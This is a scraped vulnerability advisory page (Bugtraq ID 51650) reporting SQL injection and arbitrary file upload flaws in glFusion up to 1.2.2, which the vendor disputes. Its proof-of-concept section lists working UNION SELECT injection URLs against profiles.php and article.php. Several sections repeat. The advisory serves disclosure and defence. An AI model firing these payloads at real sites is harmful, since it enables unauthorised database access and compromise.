glFusion SQL Injection and Arbitrary File Upload Vulnerabilities
BID:51650
Info
glFusion SQL Injection and Arbitrary File Upload Vulnerabilities
| Bugtraq ID: | 51650 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 24 2012 12:00AM |
| Updated: | Feb 02 2012 09:30PM |
| Credit: | KedAns-Dz |
| Vulnerable: |
glFusion glFusion 1.2.2 glFusion glFusion 1.2.1 glFusion glFusion 1.1.3 glFusion glFusion 1.1.2 glFusion glFusion 1.1.1 glFusion glFusion 1.1 |
| Not Vulnerable: | |
Discussion
glFusion SQL Injection and Arbitrary File Upload Vulnerabilities
glFusion is prone to multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability because it fails to sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
glFusion 1.2.2 is vulnerable; other versions may also be affected.
The vendor refutes these issue stating they can not be exploited as specified.
glFusion is prone to multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability because it fails to sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
glFusion 1.2.2 is vulnerable; other versions may also be affected.
The vendor refutes these issue stating they can not be exploited as specified.
Exploit / POC
glFusion SQL Injection and Arbitrary File Upload Vulnerabilities
An attacker can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/[path]/profiles.php?sid=-1+UNION+SELECT+1,2,3,4,5,version(),NULL,6--
http://www.example.com/[path]/article.php?story='1 AND 2=-1 UNION SELECT 1,2,3,4,5,version(),NULL,6--
An attacker can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/[path]/profiles.php?sid=-1+UNION+SELECT+1,2,3,4,5,version(),NULL,6--
http://www.example.com/[path]/article.php?story='1 AND 2=-1 UNION SELECT 1,2,3,4,5,version(),NULL,6--
Solution / Fix
glFusion SQL Injection and Arbitrary File Upload Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
glFusion SQL Injection and Arbitrary File Upload Vulnerabilities
References:
References:
- glFusion Homepage (glFusion)